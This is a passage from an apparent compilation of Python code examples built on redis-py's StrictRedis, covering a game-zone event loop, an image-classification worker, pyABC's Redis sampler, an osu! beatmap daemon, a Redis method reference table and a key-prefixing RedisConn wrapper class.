        base_path = os.path.abspath(os.path.expanduser(self.world_path))

        config = None

        for serializer in SERIALIZERS.values():
            config_filename = 'config.%s' % serializer.extension
            config_path = os.path.join(base_path, config_filename)

            try:
                with open(config_path) as f:
                    config = serializer.unserialize(f.read())
            except EnvironmentError:
                continue
            except Exception as e:  # TODO: UnserializeError
                fatal('Error while reading %s: %s' % (config_path, e))

        if config is None:
            fatal('Unable to read config.{%s} from %s' % (
                ','.join(s.extension for s in SERIALIZERS.values()), base_path
            ))

        if self.id not in config['zones']:
            fatal("Undefined zone '%s'" % self.id)

        tick_interval = config['zones'][self.id].get('tick', 1)
        self.tick_interval = tick_interval

        # TODO: per-zone persistence settings

        persistence = config.get('persistence')
        if not persistence:
            fatal('Unspecified persistence settings')

        # TODO: alternate persistence modes

        if not persistence['mode'] == 'snapshot':
            fatal("Unrecognized persistence mode '%s'" % persistence['mode'])

        self.config = config

        self.redis = StrictRedis(
            config['redis']['host'],
            config['redis']['port'],
        )

        renderer_name = self.config['world'].get('renderer')
        if renderer_name:
            renderer_module_name, _, renderer_class_name = renderer_name.rpartition('.')
            renderer_module = importlib.import_module(renderer_module_name)
            self.renderer_class = getattr(renderer_module, renderer_class_name)

    @property
    def snapshot_path(self):
        snapshot_path = self.config['persistence']['file']
        try:
            snapshot_path = snapshot_path.format(id=self.id)
        except TypeError:
            pass
        return os.path.join(
            self.world_path,
            os.path.expanduser(snapshot_path)
        )

    @property
    def snapshot_serializer(self):
        extension = self.config['persistence'].get('format')
        if not extension:
            extension = os.path.splitext(self.snapshot_path)[1][1:]
        return SERIALIZERS[extension]

    def load_snapshot(self):
        if not os.path.exists(self.snapshot_path):
            return False

        log.info('Loading snapshot: %s' % self.snapshot_path)
        with open(self.snapshot_path, 'r') as f:
            snapshot = f.read()
            # if self.config['persistence'].get('compressed'):
            #     snapshot = zlib.decompress(snapshot)
            snapshot = self.snapshot_serializer.unserialize(snapshot)

            log.info('Creating entities...')

            for entity_dict in snapshot['entities']:
                entity = Entity.from_dict({
                    'id': entity_dict['id'],
                    'hearing': entity_dict['hearing'],
                }, self)
                self._max_id = max(self._max_id, entity.id)

            log.info('Creating components...')

            for entity_dict in snapshot['entities']:
                entity = self.get(entity_dict['id'])
                entity.attach_from_dict(entity_dict)

        return True

    def save_snapshot(self):
        log.info('Saving snapshot: %s' % self.snapshot_path)
        child_pid = os.fork()

        if not child_pid:
            f = tempfile.NamedTemporaryFile(delete=False)
            snapshot = self.snapshot_serializer.serialize({
                'entities': [e.to_dict() for e in self.all()]
            })
            # if self.config['persistence'].get('compressed'):
            #     snapshot = zlib.compress(snapshot)
            f.write(snapshot)
            f.close()
            shutil.move(f.name, self.snapshot_path)
            os._exit(os.EX_OK)

    def _import_subclasses(self, module_name, parent_class):
        module = importlib.import_module(module_name)
        return {
            cls.__name__: cls
            for name, cls in inspect.getmembers(module)
            if inspect.isclass(cls) and issubclass(cls, parent_class)
        }

    def load_modules(self):
        sys.path.append(self.world_path)

        self.components = self._import_subclasses(self.config['world']['components'], Component)
        self.modes = self._import_subclasses(self.config['world']['modes'], Mode)

        log.debug('Loaded %s component(s) and %s mode(s).' % (
            len(self.components), len(self.modes)
        ))

    def start(self):
        try:
            self.redis.ping()
        except ConnectionError as e:
            fatal("Redis error: %s" % e.message)

        self.running = True
        log.info('Listening.')

        # Clear any existing tick events
        self.redis.ltrim(self.tick_key, 0, 0)
        try:
            while self.running:
                self.process_one_event()
        except Exception as e:
            log.critical(traceback.format_exc())
        except BaseException as e:
            pass
        finally:
            self.save_snapshot()

    def stop(self):
        self.running = False

    def start_ticker(self):
        log.info('Ticking every %ss.' % self.tick_interval)
        tock = False
        while True:
            log.debug('Tock.' if tock else 'Tick.')
            # TODO: timestamp here instead of True, for debugging?
            self.redis.rpush(self.tick_key, True)
            sleep(self.tick_interval)
            tock = not tock

    def send_message(self, entity_id, message):
        self.redis.publish(self.messages_key(entity_id), message)

    def listen(self, entity_id):
        subscription = self.subscribe(entity_id)
        for message in subscription.listen():
            yield message['data']

    # TODO: Leaky abstraction :\
    def subscribe(self, entity_id):
        subscription = self.redis.pubsub(ignore_subscribe_messages=True)
        subscription.subscribe(self.messages_key(entity_id))
        return subscription

    def process_one_event(self):
        key, value = self.redis.blpop([self.tick_key, self.incoming_key])
        # redis-py returns bytes by default; decode before comparing keys
        key = key.decode()
        value = value.decode()

        if key == self.tick_key:
            self.perform_tick()
        else:
            entity_id, _, command = value.partition(' ')
            self.perform_command(int(entity_id), command)

    def enqueue_command(self, entity_id, command):
        self.redis.rpush(self.incoming_key, ' '.join([str(entity_id), command]))

    def perform_command(self, entity_id, command):
        entity = self.get(entity_id)
        log.debug('Processing: [%s] %s' % (entity.id, command))
        entity.perform(command)

    def perform_tick(self):
        for entity in self.ticking_entities:
            # TODO: Somehow iterate over only ticking components
            for component in entity.components:
                if component.ticking:
                    component.tick()

    # Entity helpers

    def get(self, id):
        return self.entities.get(id)

    def all(self):
        return self.entities.values()

    def find(self, component_name):
        if inspect.isclass(component_name):
            component_name = component_name.__name__
        return self.entities_by_component_name.get(component_name, set())

    def spawn(self, components=None, **kwargs):
        entity = Entity(**kwargs)
        self.add(entity)
        if components:
            entity.components.add(components)
        return entity

    def clone(self, entity):
        # TODO FIXME: This is fairly awful
        return Entity.from_dict(entity.to_dict(), self)

    def destroy(self, entity):
        entity.components.purge()
        self.remove(entity)

    def add(self, entity):
        entity.id = self.next_id()
        entity.zone = self
        self.entities[entity.id] = entity

    def remove(self, entity):
        self.entities.pop(entity.id)
        entity.zone = None
Example #24
    for i in range(5):
        pred_result.append({
            'label': predictions[i][1],
            'score': ("%.4f" % predictions[i][0])
        })
    return pred_result


if __name__ == '__main__':
    queue = StrictRedis(host='localhost', port=6379)
    model = models.inception_v3(pretrained=True)
    model.transform_input = True

    while True:
        ##receive msg
        data = queue.blpop("image")
        json_dict = data[1].decode('utf-8')
        data_dict = json.loads(json_dict)
        URL = data_dict['url']
        timestamp = data_dict['timestamp']

        ##decode the image data
        encoded_image_str = data_dict['image']
        encoded_image = encoded_image_str.encode('utf-8')
        img_data = base64.b64decode(encoded_image)
        with open('img.png', 'wb') as outfile:
            outfile.write(img_data)

        ##feed the image to preloaded V3 model to generate prediction
        image = Image.open('img.png')
        pred_result = pred(image)
Example #25
class RedisEvalParallelSampler(Sampler):
    """
    Redis based low latency sampler.
    This sampler is well performing in distributed environments.
    It is usually faster than the
    :class:`pyabc.sampler.DaskDistributedSampler` for
    short model evaluation runtimes. The longer the model evaluation times,
    the less the advantage becomes. It requires a running Redis server as
    broker.

    This sampler requires workers to be started via the command
    ``abc-redis-worker``.
    An example call might look like
    ``abc-redis-worker --host=123.456.789.123 --runtime=2h``
    to connect to a Redis server on IP ``123.456.789.123`` and to terminate
    the worker after the first population that finishes more than 2 hours
    after worker start, so the actual runtime might be longer than 2h.
    See ``abc-redis-worker --help`` for its options.

    Use the command ``abc-redis-manager`` to retrieve info and stop the running
    workers.

    Start as many workers as you wish. Workers can be dynamically added
    during the ABC run.

    Parameters
    ----------

    host: str, optional
        IP address or name of the Redis server.
        Default is "localhost"

    port: int, optional
        Port of the Redis server.
        Default is 6379.
    """
    def __init__(self, host="localhost", port=6379):
        super().__init__()
        worker_logger.debug("Redis sampler: host={} port={}".format(
            host, port))
        self.redis = StrictRedis(host=host, port=port)

    def sample_until_n_accepted(self, sample_one, simulate_one, accept_one, n):
        self.redis.set(
            SSA, cloudpickle.dumps((sample_one, simulate_one, accept_one)))
        self.redis.set(N_EVAL, 0)
        self.redis.set(N_PARTICLES, n)
        self.redis.set(N_WORKER, 0)
        self.redis.delete(QUEUE)

        id_results = []

        self.redis.publish(MSG, START)

        while len(id_results) < n:
            dump = self.redis.blpop(QUEUE)[1]
            particle_with_id = pickle.loads(dump)
            id_results.append(particle_with_id)

        while int(self.redis.get(N_WORKER).decode()) > 0:
            sleep(SLEEP_TIME)

        # make sure all results are collected
        while self.redis.llen(QUEUE) > 0:
            id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))

        self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())

        self.redis.delete(SSA)
        self.redis.delete(N_EVAL)
        self.redis.delete(N_PARTICLES)
        # avoid bias toward short running evaluations
        id_results.sort(key=lambda x: x[0])
        id_results = id_results[:n]

        population = [res[1] for res in id_results]
        return population
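
A minimal sketch of plugging this sampler into a pyABC run; host and port are
placeholders, and model, prior and distance stand for the usual ABCSMC
arguments, which are assumed to be defined elsewhere:

from pyabc import ABCSMC
from pyabc.sampler import RedisEvalParallelSampler

sampler = RedisEvalParallelSampler(host="123.456.789.123", port=6379)
# Workers started with `abc-redis-worker --host=123.456.789.123` pick up
# the simulation jobs that this sampler distributes.
abc = ABCSMC(model, prior, distance, sampler=sampler)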
Example #26
class BeatmapDaemon:
    def __init__(self):
        self.crawler = BeatmapCrawler(OSU_ACCOUNT['username'], OSU_ACCOUNT['password'])
        handlers = []
        for SERVER in SERVERS:
            handler_class = SERVER['handler']
            handler = handler_class(DownloadServer.objects.get(pk=SERVER['server_id']), SERVER['config'])
            handler.init()
            handlers.append(handler)
        self.handlers = tuple(handlers)
        self.redis = None
        self.logger = logging.getLogger('osubeatmaps.daemon')
        """:type : logging.RootLogger """

    def ensure_beatmap(self, beatmap_id):
        try:
            beatmap = Beatmap.objects.get(pk=beatmap_id)
        except Beatmap.DoesNotExist:
            beatmap = self.crawler.crawl_single(beatmap_id)
            beatmap.save()
        return beatmap

    def check_all(self):
        for handler in self.handlers:
            downloads = handler.check_all()
            for download in downloads:
                beatmap = self.ensure_beatmap(download.beatmap_id)
                try:
                    Download.objects.get(server_id=handler.server.id, beatmap_id=beatmap.id)
                except Download.DoesNotExist:
                    download.save()

    def process_single(self, beatmap_id):
        """

        :param beatmap_id:
        :return: timestamp of finishing downloading
        """
        self.crawler.ensure_login()
        self.crawler.crawl_single(beatmap_id).save()
        p = self.crawler.download_beatmap(beatmap_id)
        tmp = tempfile.mkstemp()
        os.close(tmp[0])
        tmp_filename = tmp[1]
        tmp_file = open(tmp_filename, 'wb')
        shutil.copyfileobj(p[1], tmp_file)
        tmp_file.close()
        p[1].close()
        # record the finishing time.
        ret = time.time()
        threads = []
        """:type : list of Thread """
        # invoke each handler
        for handler in self.handlers:
            # bind handler as a default argument: a bare closure would see
            # only the loop's final handler once the threads actually run
            def handle(handler=handler):
                _tmp_file = open(tmp_filename, 'rb')
                handler.upload(p[0], _tmp_file).save()
                _tmp_file.close()

            thread = Thread(None, handle)
            threads.append(thread)
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        # remove downloaded file
        os.unlink(tmp_filename)
        # return the timestamp indicating download finishing time.
        return ret

    # noinspection PyBroadException
    def run_daemon(self):
        self.logger.info("Starting beatmap daemon.")
        self.redis = StrictRedis()
        while True:
            try:
                beatmap_id = int(self.redis.blpop(FETCH_QUEUE_KEY)[1])
                self.logger.info('Now processing beatmap #%d.', beatmap_id)
                try:
                    django.db.close_old_connections()
                    stamp = self.process_single(beatmap_id)
                    self.logger.info('Finished processing beatmap #%d.', beatmap_id)
                    delta_time = time.time() - stamp
                    if delta_time < DOWNLOAD_SLEEP_TIME:
                        time.sleep(DOWNLOAD_SLEEP_TIME - delta_time)
                except Exception as e:
                    self.logger.exception("An exception was raised while processing beatmap #%d. Aborting.", beatmap_id)

            except KeyboardInterrupt:
                self.logger.info("stopping beatmap daemon.")
                quit()
            except Exception as e:
                self.logger.exception("An exception was raised while processing the crawling queue.")
                self.logger.critical("Error while processing the crawling queue.")
Example #27
flushdb()                       Delete all keys in the currently selected database      flushdb()                           True
flushall()                      Delete all keys in all databases                        flushall()                          True

List operations
        Method                      Purpose                                                         Example                             Result
rpush(name, *values)        Append one or more values to the list stored at name               redis.rpush('list', 1, 2, 3)        3, the list size
lpush(name, *values)        Prepend one or more values to the list stored at name              redis.lpush('list', 0)              4, the list size
llen(name)                  Return the length of the list stored at name                       redis.llen('list')                  4
lrange(name, start, end)    Return the elements of the list between start and end              redis.lrange('list', 1, 3)          [b'3', b'2', b'1']
ltrim(name, start, end)     Trim the list, keeping only the elements from start to end         ltrim('list', 1, 3)                 True
lindex(name, index)         Return the element at position index of the list                   redis.lindex('list', 1)             b'2'
lset(name, index, value)    Set the element at position index (errors if out of range)         redis.lset('list', 1, 5)            True
lrem(name, count, value)    Remove count occurrences of value from the list                    redis.lrem('list', 2, 3)            1, the number removed
lpop(name)                  Pop and return the first element of the list                       redis.lpop('list')                  b'5'
rpop(name)                  Pop and return the last element of the list                        redis.rpop('list')                  b'2'
blpop(keys, timeout=0)      Pop and return the first element of the lists in keys, blocking while they are empty   redis.blpop('list')    [b'5']
brpop(keys, timeout=0)      Pop and return the last element, blocking while the list is empty  redis.brpop('list')                 [b'2']
rpoplpush(src, dst)         Pop the last element of src and push it onto the head of dst       redis.rpoplpush('list', 'list2')    b'2'

Set operations
        Method                          Purpose                                             Example                                             Result
sadd(name, *values)             Add elements to the set stored at name                  redis.sadd('tags', 'Book', 'Tea', 'Coffee')         3, the number inserted
srem(name, *values)             Remove elements from the set stored at name             redis.srem('tags', 'Book')                          1, the number removed
spop(name)                      Remove and return a random element of the set           redis.spop('tags')                                  b'Tea'
smove(src, dst, value)          Move value from the set at src to the set at dst        redis.smove('tags', 'tags2', 'Coffee')              True
scard(name)                     Return the number of elements in the set                redis.scard('tags')                                 3
sismember(name, value)          Test whether value is a member of the set               redis.sismember('tags', 'Book')                     True
sinter(keys, *args)             Return the intersection of the given sets               redis.sinter(['tags', 'tags2'])                     {b'Coffee'}
sinterstore(dest, keys, *args)  Store the intersection of the given sets in dest        redis.sinterstore('inttag', ['tags', 'tags2'])      1
sunion(keys, *args)             Return the union of the given sets                      redis.sunion(['tags', 'tags2'])                     {b'Coffee', b'Book', b'Pen'}
sunionstore(dest, keys, *args)  Store the union of the given sets in dest               redis.sunionstore('inttag', ['tags', 'tags2'])      3
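
A short run-through of the list commands from the table above, assuming a
fresh local Redis (names mirror the table's examples):

from redis import StrictRedis

redis = StrictRedis()
redis.delete('list')
redis.rpush('list', 1, 2, 3)            # -> 3, the list size
redis.lpush('list', 0)                  # -> 4
print(redis.lrange('list', 0, -1))      # [b'0', b'1', b'2', b'3']
print(redis.blpop('list', timeout=1))   # (b'list', b'0'): a (key, value) pair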
Example #28
class RedisConn(object):
    """docstring for RedisConn"""

    def __init__(self, startup_nodes=None, host="localhost",
                 port=6379, db=0, password=None, encoding='utf-8',
                 socket_keepalive=False, connection_pool=None,
                 max_connections=None, project="", decode_responses=True, **kwargs):
        if project:
            project = f'{project}:'
        self.cluster_flag = False
        self.project = project
        if startup_nodes:
            from rediscluster import StrictRedisCluster
            if isinstance(startup_nodes, (str, bytes)):
                startup_nodes = _normalize_startup_nodes(startup_nodes)
            self._redis = StrictRedisCluster(startup_nodes=startup_nodes, decode_responses=decode_responses,
                                             skip_full_coverage_check=True, **kwargs)
            self.cluster_flag = True
        else:
            self._redis = StrictRedis(host=host, port=port, db=db, password=password,
                                      socket_keepalive=socket_keepalive, connection_pool=connection_pool,
                                      max_connections=max_connections, **kwargs)

    def add_head(self, key):
        return f'{self.project}{key}'

    # Decorator factories used inside the class body below (callable here because
    # the names are in scope while the class body executes). Each wrapper prepends
    # the project prefix to the method's key argument(s) before delegating to the
    # underlying redis client.
    def format_key():
        def make_wrapper(func):
            def wrapper(self, key, *args, **kwargs):
                new_key = self.add_head(key)
                return func(self, new_key, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_key_keys():
        def make_wrapper(func):
            def wrapper(self, key, keys, *args, **kwargs):
                new_key = self.add_head(key)
                new_keys = list(map(self.add_head, keys))
                return func(self, new_key, new_keys, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_args():
        def make_wrapper(func):
            def wrapper(self, *args, **kwargs):
                new_args = list(map(self.add_head, list(args)))
                return func(self, *new_args, **kwargs)
            return wrapper
        return make_wrapper

    def format_two_key():
        def make_wrapper(func):
            def wrapper(self, src, dst, *args, **kwargs):
                new_src = self.add_head(src)
                new_dst = self.add_head(dst)
                return func(self, new_src, new_dst, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_keys():
        def make_wrapper(func):
            def wrapper(self, keys, *args):
                new_keys = list(map(self.add_head, keys))
                return func(self, new_keys, *args)
            return wrapper
        return make_wrapper

    def format_dicts():
        def make_wrapper(func):
            def wrapper(self, mapping, *args):
                new_mapping = {}
                for key in mapping.keys():
                    new_key = self.add_head(key)
                    new_mapping[new_key] = mapping[key]
                return func(self, new_mapping, *args)
            return wrapper
        return make_wrapper

    @format_args()
    def unlink(self, *keys):
        """
        time complexity O(1)
        Asynchronously delete the given keys (non-blocking DEL)
        """
        return self._redis.unlink(*keys)

    def pipeline(self, transaction=True, shard_hint=None):
        """
        Return a pipeline object
        """
        return self._redis.pipeline(transaction, shard_hint)

    """===============================string-start=========================="""
    # }
    @format_key()
    def set(self, key, value, ex=None, px=None, nx=False, xx=False):
        """
        time complexity O(1)
        Set the value at key ``key`` to ``value``
        Arguments:
            key (str):      key
            value (str):    value to store
            ex(int):    expiry time, in seconds
            px(int):    expiry time, in milliseconds
            nx(bool):   if True, only set the value if the key does not exist (create)
            xx(bool):   if True, only set the value if the key already exists (update)
        Returns:
            result(bool): True on success; on failure the result may be None
        """
        return self._redis.set(key, value, ex, px, nx, xx)

    @format_key()
    def get(self, key):
        """
        time complexity O(1)
        Return the value at ``key``, or None if the key doesn't exist
        Arguments:
            key (str):     key
        Returns:
            value (str): the stored value
        """
        return self._redis.get(key)

    @format_key()
    def getset(self, key, value):
        """
        time complexity O(1)
        Set a new value and return the old value
        """
        return self._redis.getset(key, value)

    @format_key()
    def strlen(self, key):
        """
        time complexity O(1)
        Return the length of the string value stored at key
        """
        return self._redis.strlen(key)

    @format_key()
    def getrange(self, key, start, end):
        """
        time complexity O(1)
        Return the substring of the value stored at key, from offset start to end
        """
        return self._redis.getrange(key, start, end)

    @format_key()
    def setrange(self, key, offset, value):
        """
        time complexity O(1)
        Overwrite part of the string stored at key, starting at offset, with the given value
        """
        return self._redis.setrange(key, offset, value)

    @format_key()
    def setbit(self, key, offset, value):
        """
        time complexity O(1)
        value must be 0 or 1
        Set the bit at offset in the binary string stored at key
        """
        return self._redis.setbit(key, offset, value)

    @format_key()
    def getbit(self, key, offset):
        """
        time complexity O(1)
        Return the bit at offset in the binary string stored at key
        """
        return self._redis.getbit(key, offset)

    @format_key()
    def expire(self, key, time):
        """
        time complexity O(1)
        Set the key's time to live, in seconds
        """
        return self._redis.expire(key, time)

    @format_key()
    def pexpire(self, key, time):
        """
        time complexity O(1)
        Set the key's time to live, in milliseconds
        """
        return self._redis.pexpire(key, time)

    @format_key()
    def pexpireat(self, key, when):
        """
        time complexity O(1)
        Set the point in time at which the key expires;
        when is a Unix timestamp in milliseconds
        """
        return self._redis.pexpireat(key, when)

    @format_key()
    def pttl(self, key):
        """
        time complexity O(1)
        Return the key's remaining time to live in milliseconds; -1 if no expiry is set
        """
        return self._redis.pttl(key)

    @format_key()
    def ttl(self, key):
        """
        time complexity O(1)
        Return the key's remaining time to live in seconds; -1 if no expiry is set
        """
        return self._redis.ttl(key)

    @format_dicts()
    def mset(self, mapping):
        """
        time complexity O(n)
        Arguments:
            mapping (dict):   {name: value,name1: value1}
        Returns:
            return ok
        """
        return self._redis.mset(mapping)

    @format_dicts()
    def msetnx(self, mapping):
        """
        time complexity O(n)
        Arguments:
            mapping (dict):   {name: value,name1: value1}
        Returns:
            return (bool): unlike mset, if any of the given keys already exists nothing is set and an error is returned
        """
        return self._redis.msetnx(mapping)

    @format_keys()
    def mget(self, keys, *args):
        """
        time complexity O(n)
        Arguments:
            keys (list): [name, name1]
        Returns:
            return (list): the values of the given keys; None for any key missing from the database
        Mind!:
            Fetching many keys at once does outperform repeated get calls, but mget is O(n):
            in practice throughput drops sharply once a single call asks for more than about
            100 keys, so keep each mget batch at 100 keys or fewer. The exact threshold
            depends on your Redis instance's throughput, so measure before relying on it.
        """
        return self._redis.mget(keys, *args)
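
    # Usage sketch for the batching advice above (hypothetical key names):
    # chunk a large key list into mget calls of at most 100 keys.
    #   conn = RedisConn(project='demo')
    #   all_keys = [f'user:{i}' for i in range(1000)]
    #   values = []
    #   for i in range(0, len(all_keys), 100):
    #       values.extend(conn.mget(all_keys[i:i + 100]))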

    @format_key()
    def incr(self, key, amount=1):
        """
        time complexity O(1)
        Increment the value at key by amount and return the new value. Works only
        on String values that can be parsed as integers.
        Handy e.g. for keeping a live row count of a large SQL table.
        """
        return self._redis.incr(key, amount)

    @format_key()
    def incrbyfloat(self, key, amount=1.0):
        """
        time complexity O(1)
        amount may be negative, which subtracts instead
        Increment the value at key by amount and return the new value. Works only
        on String values that can be parsed as floats.
        Handy e.g. for keeping a live row count of a large SQL table.
        """
        return self._redis.incrbyfloat(key, amount)

    @format_key()
    def decr(self, key, amount=1):
        """
        time complexity O(1)
        Decrement the value at key by amount and return the new value. Works only
        on String values that can be parsed as integers.
        Handy e.g. for keeping a live row count of a large SQL table.
        """
        return self._redis.decr(key, amount)

    def keys(self, pattern='*'):
        """
        time complexity O(n)
        Return all keys matching pattern; use with caution in real projects
        """
        return self._redis.keys(pattern)

    @format_key()
    def move(self, key, db):
        """
        time complexity O(1)
        Move the key into another db
        """
        return self._redis.move(key, db)

    def randomkey(self):
        """
        time complexity O(1)
        Return a random key
        """
        return self._redis.randomkey()

    @format_args()
    def rename(self, src, dst):
        """
        time complexity O(1)
        Rename key src to dst
        """
        return self._redis.rename(src, dst)

    @format_args()
    def exists(self, *keys):
        """
        time complexity O(1)
        Check whether the given keys exist; returns the number of keys that do
        """
        return self._redis.exists(*keys)

    @format_args()
    def delete(self, *keys):
        """
        time complexity O(1)
        Delete the given keys
        """
        return self._redis.delete(*keys)

    @format_key()
    def type(self, key):
        """
        time complexity O(1)
        Return the type of the value stored at key
        """
        return self._redis.type(key)
# {
    """===============================string-end============================"""

    """===============================list-start============================"""
# }
    @format_keys()
    def blpop(self, keys, timeout=0):
        """
        Return and remove the head element of the first non-empty list among keys;
        if every list is empty, block until an element is pushed or the timeout
        expires. (Inside a transaction the blocking would have to stall the whole
        server to stay atomic, which would stop other clients from running LPUSH
        or RPUSH, so avoid it there.)
        A blocking command, typically used for polling / worker sessions.
        Arguments:
            keys(list): [key, key, ...]
            timeout(int): seconds
        """
        return self._redis.blpop(keys, timeout)
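
    # Usage sketch (hypothetical queue names): poll two task queues, blocking
    # for at most 5 seconds; blpop returns (key, value) or None on timeout.
    #   conn = RedisConn(project='demo')
    #   task = conn.blpop(['queue:high', 'queue:low'], timeout=5)
    #   if task is not None:
    #       source_key, payload = task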

    @format_keys()
    def brpop(self, keys, timeout=0):
        """
        Same as above, but pops from the tail instead of the head
        """
        return self._redis.brpop(keys, timeout)

    @format_two_key()
    def brpoplpush(self, src, dst, timeout=0):
        """
        Pop an element from the tail of src and push it onto the head of dst; as above, blocks while src is empty
        """
        return self._redis.brpoplpush(src, dst, timeout)

    @format_key()
    def lpush(self, key, *values):
        """
        time complexity O(n)
        Push one or more values onto the head of the list at ``key``
        Arguments:
            key (str):     key
            values (list):   the values to push
        Returns:
            result(int): the length of the list after the push
        """
        return self._redis.lpush(key, *values)

    @format_key()
    def lpushx(self, key, *values):
        """
        time complexity O(n)
        Like lpush, but only pushes when ``key`` already exists and holds a list
        Arguments:
            key (str):     key
            values (list):   the values to push
        Returns:
            result(int): the length of the list after the push
        """
        return self._redis.lpushx(key, *values)

    @format_key()
    def lpop(self, key):
        """
        time complexity O(1)
        Remove and return the head element of the list at key.
        """
        return self._redis.lpop(key)

    @format_key()
    def rpush(self, key, *values):
        """
        time complexity O(n)
        Push one or more values onto the tail of the list at ``key``
        Arguments:
            key (str):     key
            values (list):   the values to push
        Returns:
            result(int): the length of the list after the push
        """
        return self._redis.rpush(key, *values)

    @format_key()
    def rpushx(self, key, *values):
        """
        time complexity O(n)
        Like rpush, but only pushes when ``key`` already exists and holds a list
        Arguments:
            key (str):     key
            values (list):   the values to push
        Returns:
            result(int): the length of the list after the push
        """
        return self._redis.rpushx(key, *values)

    @format_key()
    def rpop(self, key):
        """
        time complexity O(1)
        Remove and return the tail element of the list at key.
        """
        return self._redis.rpop(key)

    @format_key()
    def lrange(self, key, start, end):
        """
        time complexity O(n)
        Return the list elements from start to end, inclusive. If you do not know the
        size of the list, avoid lrange(key, 0, -1) and keep the number of elements
        fetched per call under control.
        """
        return self._redis.lrange(key, start, end)

    @format_args()
    def rpoplpush(self, src, dst):
        """
        Pop an element from the tail of src and push it onto the head of dst
        """
        return self._redis.rpoplpush(src, dst)

    @format_key()
    def llen(self, key):
        """
        time complexity O(1)
        Return the length of the list; 0 if the key does not exist, an error if the value is not a list
        """
        return self._redis.llen(key)

    @format_key()
    def lindex(self, key, index):
        """
        time complexity O(n), n being the number of elements traversed
        Return the element at position index of the list at key
        """
        return self._redis.lindex(key, index)

    @format_key()
    def linsert(self, key, where, refvalue, value):
        """
        time complexity O(n), n being the number of elements traversed
        Does nothing if key or refvalue does not exist
        Arguments:
            where(str): BEFORE | AFTER, i.e. insert before or after refvalue
            refvalue(str): an existing value in the list
        """
        return self._redis.linsert(key, where, refvalue, value)

    @format_key()
    def lrem(self, key, count, value):
        """
        time complexity O(n)
        Remove up to count occurrences of value
        Arguments:
            count(int): count > 0  search from the head
                        count < 0  search from the tail
                        count = 0  remove every element equal to value
        Returns:
            result(int): the number of elements removed
        """
        if self.cluster_flag:
            return self._redis.lrem(key, value, count)
        return self._redis.lrem(key, count, value)

    @format_key()
    def lset(self, key, index, value):
        """
        time complexity O(n)
        Set the element at position index of the list; errors if the key is missing or the index is out of range
        """
        return self._redis.lset(key, index, value)

    @format_key()
    def ltrim(self, key, start, end):
        """
        time complexity O(n), n being the number of elements removed
        Trim the list so that only the elements inside the given range remain;
        everything outside the range is removed.
        """
        return self._redis.ltrim(key, start, end)

    @format_key()
    def sort(self, key, start=None, num=None, by=None, get=None,
             desc=False, alpha=False, store=None, groups=False):
        """
        time complexity O(N+M*log(M)), N being the number of elements in the
        list or set to sort and M the number of elements returned.
        Arguments:
            by(str): sort by an external pattern instead of the values themselves;
                    e.g. push per-item weights into keys like user_level_* first
                    and sort by those
            get(str): for each sorted element, fetch the value of a related key,
                    e.g. user_name_* keys where * is filled in from the list values
            store(str): store the sorted result under this key; combined with an
                    expire time it works as a result cache
            alpha: sort lexicographically
            desc: sort in descending order
        Returns:
            result(list): the sorted list
        """
        return self._redis.sort(key, start, num, by, get, desc, alpha, store, groups)
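
    # Usage sketch for sorting by an external weight (hypothetical keys):
    # 'uid' holds user ids, per-user weights live in user_level_<id> keys,
    # and user_name_<id> holds the value fetched for each sorted id.
    #   conn = RedisConn()
    #   conn.sort('uid', by='user_level_*', get='user_name_*', desc=True)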

    def scan(self, cursor=0, match=None, count=None):
        """
        time complexity O(1) per call
        Incrementally iterate the keys of the database; because the iteration
        is incremental, the same key may be returned more than once
        Arguments:
            cursor(int): iteration cursor
            match(str): glob-style pattern to match
            count(int): hint for the number of keys to return per call
        Returns:
            result(tuple): the cursor for the next scan, followed by the returned keys (list);
            a returned cursor of 0 means the whole keyspace has been traversed
        """
        return self._redis.scan(cursor, match, count)
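
    # Usage sketch: iterate the whole keyspace incrementally; iteration is
    # complete when the returned cursor is 0 again.
    #   conn = RedisConn()
    #   cursor = 0
    #   while True:
    #       cursor, keys = conn.scan(cursor, match='demo:*', count=100)
    #       handle(keys)  # hypothetical handler
    #       if cursor == 0:
    #           break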
# {
    """===============================list-end===================================="""

    """===============================hash-start==================================="""
# }
    @format_key()
    def hdel(self, key, *names):
        """
        time complexity O(n), n being the number of names
        Delete the given fields from the hash at ``key``
        Arguments:
            key (str):     key
            names(list): fields of the hash
        Returns:
            result (int): the number of fields actually deleted
        """
        return self._redis.hdel(key, *names)

    @format_key()
    def hexists(self, key, name):
        """
        time complexity O(1)
        Check whether the hash at key has the field name
        """
        return self._redis.hexists(key, name)

    @format_key()
    def hget(self, key, name):
        """
        time complexity O(1)
        """
        return self._redis.hget(key, name)

    @format_key()
    def hgetall(self, key):
        """
        time complexity O(n)
        """
        return self._redis.hgetall(key)

    @format_key()
    def hincrby(self, key, name, amount=1):
        """
        time complexity O(1)
        amount may be negative; the field value must be an integer, otherwise an error is returned
        """
        return self._redis.hincrby(key, name, amount)

    @format_key()
    def hincrbyfloat(self, key, name, amount=1.0):
        """
        time complexity O(1)
        """
        return self._redis.hincrbyfloat(key, name, amount)

    @format_key()
    def hkeys(self, key):
        """
        time complexity O(n)
        """
        return self._redis.hkeys(key)

    @format_key()
    def hlen(self, key):
        """
        time complexity O(1)
        """
        return self._redis.hlen(key)

    @format_key()
    def hset(self, key, name, value):
        """
        time complexity O(1)
        """
        return self._redis.hset(key, name, value)

    @format_key()
    def hsetnx(self, key, name, value):
        """
        time complexity O(1)
        """
        return self._redis.hsetnx(key, name, value)

    @format_key()
    def hmset(self, key, mapping):
        """
        time complexity O(n)
        """
        return self._redis.hmset(key, mapping)

    @format_key()
    def hmget(self, key, names, *args):
        """
        time complexity O(n)
        """
        return self._redis.hmget(key, names, *args)

    @format_key()
    def hvals(self, key):
        """
        time complexity O(n)
        Return all the values of the hash
        """
        return self._redis.hvals(key)

    @format_key()
    def hstrlen(self, key, name):
        """
        time complexity O(1)
        """
        return self._redis.hstrlen(key, name)
# {
    """=================================hash-end==================================="""

    """=================================set-start================================="""
# }
    @format_key()
    def sadd(self, key, *values):
        """
        time complexity O(n), n being the number of values
        """
        return self._redis.sadd(key, *values)

    @format_key()
    def scard(self, key):
        """
        time complexity O(1)
        Return the number of elements in the set
        """
        return self._redis.scard(key)

    @format_args()
    def sdiff(self, key, *args):
        """
